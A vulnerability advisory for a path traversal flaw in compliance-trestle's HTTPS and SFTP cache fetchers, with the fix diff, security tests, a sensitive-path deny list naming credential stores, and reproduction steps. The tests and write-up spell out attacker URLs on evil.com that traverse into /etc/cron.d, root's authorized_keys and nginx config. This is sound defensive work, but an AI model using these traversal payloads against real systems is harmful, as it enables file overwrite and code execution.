    +            '\\AppData\\Roaming\\Microsoft\\Credentials',
    +            '\\AppData\\Local\\Microsoft\\Vault',
    +            # Common sensitive config locations
    +            '/var/log',
    +            '/var/run',
    +            'C:\\Windows\\Logs',
    +            # Database files
    +            '/var/lib/mysql',
    +            '/var/lib/postgresql',
    +            'C:\\Program Files\\MySQL',
    +            'C:\\Program Files\\PostgreSQL',
    +        ]
    +
    +        # Check if the resolved path contains any sensitive patterns
    +        # Use both the original path and resolved path for checking
    +        file_str = str(resolved_file).lower()
    +        original_str = str(file_path).lower()
    +
    +        for sensitive in sensitive_paths:
    +            sensitive_lower = sensitive.lower()
    +            # Check both original and resolved paths
    +            if sensitive_lower in file_str or sensitive_lower in original_str:
    +                raise TrestleError(
    +                    f'Attempt to access potentially sensitive system file: {file_path}. '
    +                    'This may indicate a security issue.'
    +                )
    +
    +
    +# Made with Bob
    
89f4e53d159e

Merge commit from fork

https://github.com/oscal-compass/compliance-trestle · Lou DeGenaro · May 18, 2026 · via ghsa-ref
3 files changed · +363 -4
  • tests/trestle/core/remote/cache_security_test.py · +235 -0 · added
    @@ -0,0 +1,235 @@
    +# -*- mode:python; coding:utf-8 -*-
    +
    +# Copyright (c) 2026 The OSCAL Compass Authors.
    +#
    +# Licensed under the Apache License, Version 2.0 (the "License");
    +# you may not use this file except in compliance with the License.
    +# You may obtain a copy of the License at
    +#
    +#     https://www.apache.org/licenses/LICENSE-2.0
    +#
    +# Unless required by applicable law or agreed to in writing, software
    +# distributed under the License is distributed on an "AS IS" BASIS,
    +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    +# See the License for the specific language governing permissions and
    +# limitations under the License.
    +"""Security tests for cache path traversal vulnerabilities."""
    +
    +import pathlib
    +
    +import pytest
    +
    +import tests.test_utils as test_utils
    +
    +from trestle.common.err import TrestleError
    +from trestle.core.remote.cache import HTTPSFetcher, SFTPFetcher
    +from trestle.core.remote.security import PathSecurityValidator
    +
    +
    +class TestPathValidation:
    +    """Test path validation functions."""
    +
    +    def test_validate_url_path_normal(self) -> None:
    +        """Test that normal paths pass validation."""
    +        PathSecurityValidator.validate_url_path_for_cache('/normal/path.json')  # Should not raise
    +        PathSecurityValidator.validate_url_path_for_cache('/path/to/file.json')  # Should not raise
    +        PathSecurityValidator.validate_url_path_for_cache('/data/catalog.json')  # Should not raise
    +
    +    def test_validate_url_path_blocks_traversal(self) -> None:
    +        """Test that paths with .. are blocked."""
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../../../etc/passwd')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/path/../file.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../file.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../../../../../../tmp/pwned.json')
    +
    +
    +class TestPathSecurityValidator:
    +    """Test path security validation."""
    +
    +    def test_validate_cache_path_within_cache(self, tmp_path: pathlib.Path) -> None:
    +        """Test that valid paths within cache are accepted."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Valid path within cache
    +        valid_path = cache_root / 'example.com' / 'data' / 'file.json'
    +        PathSecurityValidator.validate_cache_path(valid_path, cache_root)  # Should not raise
    +
    +    def test_validate_cache_path_traversal_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that path traversal outside cache is blocked."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Attempt to traverse outside cache
    +        evil_path = cache_root / '..' / '..' / 'etc' / 'passwd'
    +
    +        with pytest.raises(TrestleError, match='Security violation.*path traversal blocked'):
    +            PathSecurityValidator.validate_cache_path(evil_path, cache_root)
    +
    +    def test_validate_cache_path_absolute_outside_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that absolute paths outside cache are blocked."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Absolute path outside cache
    +        evil_path = pathlib.Path('/tmp/pwned.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation.*path traversal blocked'):
    +            PathSecurityValidator.validate_cache_path(evil_path, cache_root)
    +
    +    def test_validate_cache_path_unexpected_error(self, tmp_path: pathlib.Path, monkeypatch) -> None:
    +        """Test that unexpected errors during validation are caught and wrapped."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        valid_path = cache_root / 'example.com' / 'file.json'
    +
    +        # Mock relative_to() to raise an unexpected exception (not ValueError)
    +        def mock_relative_to(self, other, *args, **kwargs):
    +            # Raise a non-ValueError exception to trigger the generic except block
    +            raise RuntimeError('Unexpected filesystem error')
    +
    +        monkeypatch.setattr(pathlib.Path, 'relative_to', mock_relative_to)
    +
    +        with pytest.raises(TrestleError, match='Error validating cache path'):
    +            PathSecurityValidator.validate_cache_path(valid_path, cache_root)
    +
    +
    +class TestHTTPSFetcherPathTraversal:
    +    """Test HTTPSFetcher protection against path traversal attacks."""
    +
    +    def test_https_fetcher_blocks_path_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that HTTPSFetcher blocks path traversal in cache paths."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Malicious URL with path traversal
    +        evil_url = 'https://evil.com/../../../../../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_https_fetcher_allows_normal_paths(self, tmp_path: pathlib.Path) -> None:
    +        """Test that HTTPSFetcher allows normal paths without traversal."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Normal URL without traversal
    +        normal_url = 'https://example.com/catalogs/nist/catalog.json'
    +
    +        # Should not raise
    +        fetcher = HTTPSFetcher(tmp_path, normal_url)
    +
    +        # Verify cache path is within cache directory
    +        cache_dir = tmp_path / '.trestle' / 'cache'
    +        assert str(fetcher._cached_object_path).startswith(str(cache_dir))
    +
    +    def test_https_fetcher_blocks_embedded_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that embedded path traversal sequences are blocked."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # URL with embedded traversal should be blocked
    +        url = 'https://example.com/path/../data/file.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, url)
    +
    +
    +class TestSFTPFetcherPathTraversal:
    +    """Test SFTPFetcher protection against path traversal attacks."""
    +
    +    def test_sftp_fetcher_blocks_path_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that SFTPFetcher blocks path traversal in cache paths."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Malicious SFTP URL with path traversal
    +        evil_url = 'sftp://evil.com/../../../../../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, evil_url)
    +
    +    def test_sftp_fetcher_allows_normal_paths(self, tmp_path: pathlib.Path) -> None:
    +        """Test that SFTPFetcher allows normal paths without traversal."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Normal SFTP URL without traversal
    +        normal_url = 'sftp://example.com/data/catalog.json'
    +
    +        # Should not raise
    +        fetcher = SFTPFetcher(tmp_path, normal_url)
    +
    +        # Verify cache path is within cache directory
    +        cache_dir = tmp_path / '.trestle' / 'cache'
    +        assert str(fetcher._cached_object_path).startswith(str(cache_dir))
    +
    +    def test_sftp_fetcher_blocks_embedded_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that embedded path traversal sequences are blocked."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # SFTP URL with embedded traversal should be blocked
    +        url = 'sftp://example.com/path/../data/file.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, url)
    +
    +
    +class TestRealWorldAttackVectors:
    +    """Test real-world attack vectors from the security advisory."""
    +
    +    def test_attack_vector_cron_injection(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of cron job injection attack vector."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to /etc/cron.d/backdoor
    +        evil_url = 'https://evil.com/../../../../../../../etc/cron.d/backdoor'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_ssh_keys(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of SSH authorized_keys injection."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to ~/.ssh/authorized_keys
    +        evil_url = 'https://evil.com/../../../../../../../root/.ssh/authorized_keys'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_tmp_write(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of arbitrary /tmp file write."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to /tmp/pwned.json
    +        evil_url = 'https://evil.com/../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_config_overwrite(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of config file overwrite."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Overwrite nginx config
    +        evil_url = 'https://evil.com/../../../../../../../etc/nginx/conf.d/evil.conf'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_sftp_private_network(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of SFTP path traversal to system files."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: SFTP to internal host with path traversal
    +        evil_url = 'sftp://192.168.1.1/../../../../../../../etc/passwd'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, evil_url)
    +
    +
    +# Made with Bob
    
  • trestle/core/remote/cache.py · +30 -4 · modified
    @@ -41,6 +41,7 @@
     from trestle.common.err import TrestleError
     from trestle.core import parser
     from trestle.core.base_model import OscalBaseModel
    +from trestle.core.remote.security import PathSecurityValidator
     
     logger = logging.getLogger(__name__)
     
    @@ -258,13 +259,26 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
                 )
             if u.hostname is None:
                 raise TrestleError(f'Cache request for {self._uri} requires hostname')
    +
    +        # Validate the URL path to prevent path traversal attacks
    +        PathSecurityValidator.validate_url_path_for_cache(u.path)
    +
             https_cached_dir = self._trestle_cache_path / u.hostname
    -        # Skip any number of back- or forward slashes preceding the URI path (u.path)
    -        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
    +
    +        # Skip any number of back- or forward slashes preceding the URI path
    +        match = re.search('[^/\\\\]', u.path)
    +        if match:
    +            path_parent = pathlib.Path(u.path[match.span()[0] :]).parent
    +        else:
    +            path_parent = pathlib.Path('.')
    +
             https_cached_dir = https_cached_dir / path_parent
             https_cached_dir.mkdir(parents=True, exist_ok=True)
             self._cached_object_path = https_cached_dir / pathlib.Path(pathlib.Path(u.path).name)
     
    +        # Validate that the resolved cache path stays within the cache directory (defense in depth)
    +        PathSecurityValidator.validate_cache_path(self._cached_object_path, self._trestle_cache_path)
    +
         def _do_fetch(self) -> None:
             auth = None
             verify = None
    @@ -325,13 +339,25 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
                 logger.warning(f'Malformed URI, cannot parse path in URL {self._uri}')
                 raise TrestleError(f'Cache request for invalid input URI: missing file path {self._uri}')
     
    +        # Validate the URL path to prevent path traversal attacks
    +        PathSecurityValidator.validate_url_path_for_cache(u.path)
    +
             sftp_cached_dir = self._trestle_cache_path / u.hostname
    -        # Skip any number of back- or forward slashes preceding the URL path (u.path)
    -        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
    +
    +        # Skip any number of back- or forward slashes preceding the URL path
    +        match = re.search('[^/\\\\]', u.path)
    +        if match:
    +            path_parent = pathlib.Path(u.path[match.span()[0] :]).parent
    +        else:
    +            path_parent = pathlib.Path('.')
    +
             sftp_cached_dir = sftp_cached_dir / path_parent
             sftp_cached_dir.mkdir(parents=True, exist_ok=True)
             self._cached_object_path = sftp_cached_dir / pathlib.Path(pathlib.Path(u.path).name)
     
    +        # Validate that the resolved cache path stays within the cache directory (defense in depth)
    +        PathSecurityValidator.validate_cache_path(self._cached_object_path, self._trestle_cache_path)
    +
         def _do_fetch(self) -> None:
             """Fetch remote object and update the cache if appropriate and possible to do so.
     
    
  • trestle/core/remote/security.py · +98 -0 · added
    @@ -0,0 +1,98 @@
    +# -*- mode:python; coding:utf-8 -*-
    +
    +# Copyright (c) 2026 The OSCAL Compass Authors.
    +#
    +# Licensed under the Apache License, Version 2.0 (the "License");
    +# you may not use this file except in compliance with the License.
    +# You may obtain a copy of the License at
    +#
    +#     https://www.apache.org/licenses/LICENSE-2.0
    +#
    +# Unless required by applicable law or agreed to in writing, software
    +# distributed under the License is distributed on an "AS IS" BASIS,
    +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    +# See the License for the specific language governing permissions and
    +# limitations under the License.
    +"""
    +Security utilities for remote fetching operations.
    +
    +Provides path validation to prevent path traversal attacks.
    +"""
    +
    +import logging
    +import pathlib
    +
    +from trestle.common.err import TrestleError
    +
    +logger = logging.getLogger(__name__)
    +
    +
    +class PathSecurityValidator:
    +    """Validator for ensuring file paths remain within allowed boundaries."""
    +
    +    @staticmethod
    +    def validate_url_path_for_cache(url_path: str) -> None:
    +        """
    +        Validate a URL path component to prevent path traversal attacks.
    +
    +        Detects path traversal attempts (..) and raises an exception to block the attack.
    +        This prevents directory traversal attacks when constructing cache file paths.
    +
    +        Args:
    +            url_path: The path component from a URL (e.g., from urlparse().path)
    +
    +        Raises:
    +            TrestleError: If path contains traversal sequences (..)
    +
    +        Example:
    +            >>> PathSecurityValidator.validate_url_path_for_cache('/normal/path.json')  # No exception
    +            >>> PathSecurityValidator.validate_url_path_for_cache('/../../../etc/passwd')  # Raises TrestleError
    +        """
    +        # Check for path traversal sequences
    +        if '..' in url_path:
    +            raise TrestleError(
    +                f'Security violation: Path traversal blocked. '
    +                f'URL path "{url_path}" contains ".." sequences which could '
    +                f'allow writing files outside the cache directory.'
    +            )
    +
    +    @staticmethod
    +    def validate_cache_path(cache_path: pathlib.Path, cache_root: pathlib.Path) -> None:
    +        """
    +        Validate that a cache file path stays within the cache directory.
    +
    +        Uses path resolution and relative_to() to ensure the resolved cache path
    +        is actually within the cache root directory, preventing path traversal attacks.
    +
    +        Args:
    +            cache_path: The proposed cache file path to validate
    +            cache_root: The root cache directory that must contain the cache_path
    +
    +        Raises:
    +            TrestleError: If cache_path resolves outside cache_root
    +
    +        Example:
    +            >>> cache_root = pathlib.Path('/home/user/.trestle/cache')
    +            >>> cache_path = cache_root / 'evil.com' / '..' / '..' / 'etc' / 'passwd'
    +            >>> validate_cache_path(cache_path, cache_root)  # Raises TrestleError
    +        """
    +        # Resolve both paths to absolute, normalized paths
    +        resolved_cache = cache_path.resolve()
    +        resolved_root = cache_root.resolve()
    +
    +        try:
    +            # Check if cache path is relative to (within) cache root
    +            resolved_cache.relative_to(resolved_root)
    +
    +        except ValueError as e:
    +            # relative_to() raises ValueError if path is not relative to root
    +            raise TrestleError(
    +                f'Security violation: Cache path traversal blocked. '
    +                f'Attempted to write to "{resolved_cache}" which is outside '
    +                f'the cache directory "{resolved_root}"'
    +            ) from e
    +        except Exception as e:
    +            raise TrestleError(f'Error validating cache path "{cache_path}": {e}') from e
    +
    +
    +# Made with Bob
    

Vulnerability mechanics

Root cause

"Missing sanitization of `../` path traversal sequences from the URL path component when constructing the local cache file path, combined with no boundary check on the resolved path."

Attack vector

An attacker crafts a malicious OSCAL profile whose `imports` section contains an `href` URL with path traversal sequences (e.g., `https://evil.com/../../../../../../../tmp/pwned.json`) [ref_id=1][ref_id=2]. When compliance-trestle fetches that `href`, `HTTPSFetcher` (or `SFTPFetcher`) builds the cache path by joining the cache directory, the hostname, and the unsanitized URL path [ref_id=1]. The `../` segments make the joined path resolve outside the intended cache directory, and `mkdir(parents=True, exist_ok=True)` creates any missing intermediate directories along it [ref_id=1]. The attacker-controlled HTTP response body is then written to the traversed path via `write_text()` [ref_id=1]. The result is an arbitrary file write, which can be escalated to remote code execution by overwriting cron jobs, SSH authorized keys, or configuration files [ref_id=1][ref_id=2].
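
The path construction described above can be reproduced without any network access. The following is a minimal sketch, not the library's code: `vulnerable_cache_path` is a hypothetical helper that mirrors the pre-patch logic quoted in the advisory, and it deliberately skips `mkdir()` and the file write so that nothing is created outside a temporary directory. It assumes Python 3.9+ for `Path.is_relative_to()`.

```python
import pathlib
import re
import tempfile
from urllib import parse


def vulnerable_cache_path(cache_root: pathlib.Path, uri: str) -> pathlib.Path:
    """Mirror the pre-patch cache path construction (hypothetical helper, no mkdir, no write)."""
    u = parse.urlparse(uri)
    cached_dir = cache_root / u.hostname
    # Skip leading slashes, then keep the parent directories, including any '..'
    first = re.search(r'[^/\\]', u.path).span()[0]
    path_parent = pathlib.Path(u.path[first:]).parent
    return cached_dir / path_parent / pathlib.Path(u.path).name


with tempfile.TemporaryDirectory() as tmp:
    cache_root = pathlib.Path(tmp).resolve() / '.trestle' / 'cache'
    cache_root.mkdir(parents=True)

    evil = vulnerable_cache_path(cache_root, 'https://evil.com/../../../../../../../tmp/pwned.json')
    benign = vulnerable_cache_path(cache_root, 'https://example.com/catalogs/catalog.json')

    # A path "escapes" when its resolved form is no longer under the cache root
    evil_escapes = not evil.resolve().is_relative_to(cache_root)
    benign_escapes = not benign.resolve().is_relative_to(cache_root)
    print(evil_escapes, benign_escapes)
```

The traversal URL yields a path that resolves outside the cache root, while the ordinary URL stays inside it. Where exactly the traversal lands depends on how deep the cache directory sits on the filesystem.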

Affected code

The vulnerability resides in `trestle/core/remote/cache.py` in both `HTTPSFetcher.__init__` (lines 259-266) and `SFTPFetcher.__init__` (lines 328-333) [ref_id=1][ref_id=2]. The URL path component from `urlparse()` is used directly to construct the local cache file path without sanitizing `../` sequences, and no boundary check (e.g., `is_relative_to()`) is performed on the resolved path [ref_id=1].

What the fix does

The patch introduces a new module `trestle/core/remote/security.py` containing `PathSecurityValidator` with two static methods [patch_id=2797568]. `validate_url_path_for_cache()` raises `TrestleError` if the URL path contains `..` anywhere, blocking traversal at the path-string level [patch_id=2797568]. `validate_cache_path()` resolves both the constructed cache path and the cache root, then uses `relative_to()` to confirm the cache path stays within the cache directory, providing defense in depth [patch_id=2797568]. Both `HTTPSFetcher` and `SFTPFetcher` call these validators in `__init__`: the string check runs before the cache directory is created, and the resolved-path check runs after `mkdir()` but before any content is fetched or written [patch_id=2797568]. The same fix is backported to the v3 branch in a separate commit [patch_id=2797569].
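
The two layers can be illustrated in isolation. This is a sketch under stated assumptions rather than the patched module itself: `CachePathError`, `check_url_path`, `check_cache_path`, and `is_blocked` are hypothetical names used so the example runs without compliance-trestle installed, but the checks follow the same logic as the diff (a `'..'` substring test, then `resolve()` plus `relative_to()`).

```python
import pathlib
import tempfile


class CachePathError(Exception):
    """Hypothetical stand-in for TrestleError so the sketch has no trestle dependency."""


def check_url_path(url_path: str) -> None:
    # Layer 1: conservative substring test on the raw URL path
    if '..' in url_path:
        raise CachePathError(f'Path traversal blocked: {url_path!r}')


def check_cache_path(cache_path: pathlib.Path, cache_root: pathlib.Path) -> None:
    # Layer 2: resolve both paths, then require that one contains the other
    resolved_cache = cache_path.resolve()
    resolved_root = cache_root.resolve()
    try:
        resolved_cache.relative_to(resolved_root)
    except ValueError as e:
        raise CachePathError(f'{resolved_cache} is outside {resolved_root}') from e


def is_blocked(check, *args) -> bool:
    """Return True if the given check rejects its arguments."""
    try:
        check(*args)
    except CachePathError:
        return True
    return False


with tempfile.TemporaryDirectory() as tmp:
    root = pathlib.Path(tmp) / '.trestle' / 'cache'
    root.mkdir(parents=True)
    results = {
        'url_traversal': is_blocked(check_url_path, '/../../etc/passwd'),
        'url_normal': is_blocked(check_url_path, '/data/catalog.json'),
        'url_double_dot_name': is_blocked(check_url_path, '/data/file..json'),
        'path_escape': is_blocked(check_cache_path, root / '..' / '..' / 'etc' / 'passwd', root),
        'path_inside': is_blocked(check_cache_path, root / 'example.com' / 'file.json', root),
    }
print(results)
```

Because the first layer is a plain substring test, it also rejects a harmless file name such as `file..json`. That is a conservative trade-off: some legitimate URLs are refused, but the check does not depend on how the path is later split into segments.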

Preconditions

  • input: The attacker must control a remote OSCAL profile that the victim's compliance-trestle instance will fetch (e.g., via an imports href)
  • config: The victim must run compliance-trestle with a version prior to the fix (e.g., v4.0.2) and the tool must process the malicious profile
  • network: The attacker's server must be reachable from the victim's machine and must respond with attacker-controlled content
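
The input precondition can be checked before a profile is processed. The sketch below is a hypothetical triage helper, not part of compliance-trestle: `traversal_hrefs` assumes the profile has already been loaded into a dictionary with the usual OSCAL layout (`profile` → `imports` → `href`), and it flags any import whose URL path has a `..` segment.

```python
import json
import re
from urllib import parse


def traversal_hrefs(profile_doc: dict) -> list[str]:
    """Return import hrefs whose URL path contains a '..' segment (hypothetical helper)."""
    imports = profile_doc.get('profile', {}).get('imports', [])
    flagged = []
    for imp in imports:
        href = imp.get('href', '')
        # Split on both slash styles, since the cache code tolerates either
        segments = re.split(r'[/\\]', parse.urlparse(href).path)
        if '..' in segments:
            flagged.append(href)
    return flagged


sample = json.loads('''
{
  "profile": {
    "imports": [
      {"href": "https://example.com/catalogs/catalog.json"},
      {"href": "https://evil.com/../../../../../../../tmp/pwned.json"}
    ]
  }
}
''')
flagged = traversal_hrefs(sample)
print(flagged)
```

This only inspects the top-level profile. Profiles that import other remote profiles would need the same check applied at each level, and upgrading to a fixed release remains the actual remedy.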

Reproduction

Install the vulnerable version: `pip install compliance-trestle==4.0.2`. Create a malicious OSCAL profile (e.g., `malicious_profile.yaml`) whose imports `href` contains path traversal: `href: "https://evil.com/../../../../../../../tmp/trestle_pwned.json"` [ref_id=1][ref_id=2]. Run compliance-trestle so that it processes this profile. The attacker-controlled HTTP response body is then written to `/tmp/trestle_pwned.json` [ref_id=1]. The advisory also provides a standalone Python simulation script that reproduces the exact cache path construction logic and demonstrates the traversal [ref_id=1].

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4
